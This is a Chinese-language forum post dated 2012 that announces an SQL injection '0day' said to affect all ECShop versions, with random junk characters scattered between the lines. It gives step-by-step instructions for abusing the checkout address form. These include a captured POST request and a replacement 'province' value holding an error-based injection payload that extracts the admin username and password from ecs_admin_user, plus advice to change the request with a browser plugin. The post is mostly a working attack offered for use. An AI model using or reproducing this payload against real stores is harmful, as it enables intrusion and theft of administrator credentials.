中国网络渗透测试联盟
标题:
ECShop全版本SQL注入0day
[打印本页]
作者:
admin
时间:
2012-12-31 09:19
标题:
ECShop全版本SQL注入0day
感谢欠杀的黑盒
6 ?1 {( w( R+ b% m) P
2 R+ ?9 z0 d. O
; ^6 q& c: |- E7 J$ P2 M
把任意商品加入购物车在填写配送地址那一页,有地区选择
- h* y w- k& P* G L' a
# {: c6 g* m/ h6 L
flow.php?step=consignee&direct_shopping=1
) \, N9 Z7 u* f0 _
比如省选择安徽
[: E6 A6 W9 V$ U4 v. o
" _! O! i( Z/ p" j/ X1 r9 g$ h, }
其中POST数据如下
. ?0 f4 P' U( h4 Z( o, X: s, R
# T# T. M2 t+ k! E; E& s4 H
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
' ~) u2 u* r# J8 k
改成
8 ]: A* w! F* [' D# c3 E+ q/ _9 j% @
- w: n( F, C" b( @! q: J A& G ]
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
- k- `+ N* _; @5 C3 O
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
# [2 b, [1 [; s# D% [0 m6 ~
# d) ?7 C% v" ^) x! f9 |
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
+ m, o: G. ?, e
t) p4 v* `* D+ }
就会回显错误页面了。。。。
! U! S: q2 t1 ^" ^( L
; r& S" ~7 X" |: g
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
) h* D1 B3 l5 p, Z' d( i
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2